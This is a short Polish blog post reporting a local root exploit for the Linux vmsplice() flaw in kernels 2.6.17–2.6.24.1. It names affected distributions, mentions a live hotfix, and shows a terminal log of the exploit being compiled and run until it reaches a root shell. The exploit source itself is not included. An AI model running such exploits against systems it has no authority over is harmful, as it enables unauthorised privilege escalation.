Właśnie pojawił się nowy lokalny exploit na roota,
działający w kernelach 2.6.17 – 2.6.24.1. Dawno już nie było chyba takiego
babola, który dotknąłby tyle wersji kernela naraz. Działa na pewno
w obecnych wersjach Ubuntu, Debiana, Fedory i pewnie wielu innych. No to
czeka nas rundka paczowania, motyla noga! Dziura dotyczy funkcji
vmsplice(),
której wsparcie zresztą można wyłączyć na etapie kompilacji.
Na szczęście jest już szybka poprawka działająca na żywym systemie (nie wymaga reinstalowania jądra).
Exploit w działaniu:
wanted@fafik: /crack/local-root-exp$ gcc exp.c -static -Wno-format wanted@fafik: /crack/local-root-exp$ ./a.out ———————————– Linux vmsplice Local Root Exploit By qaaz ———————————– [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7ede000 .. 0xb7f10000 [+] root root@fafik: /crack/local-root-exp# id uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),106(lpadmin),107(admin),1000(wanted)
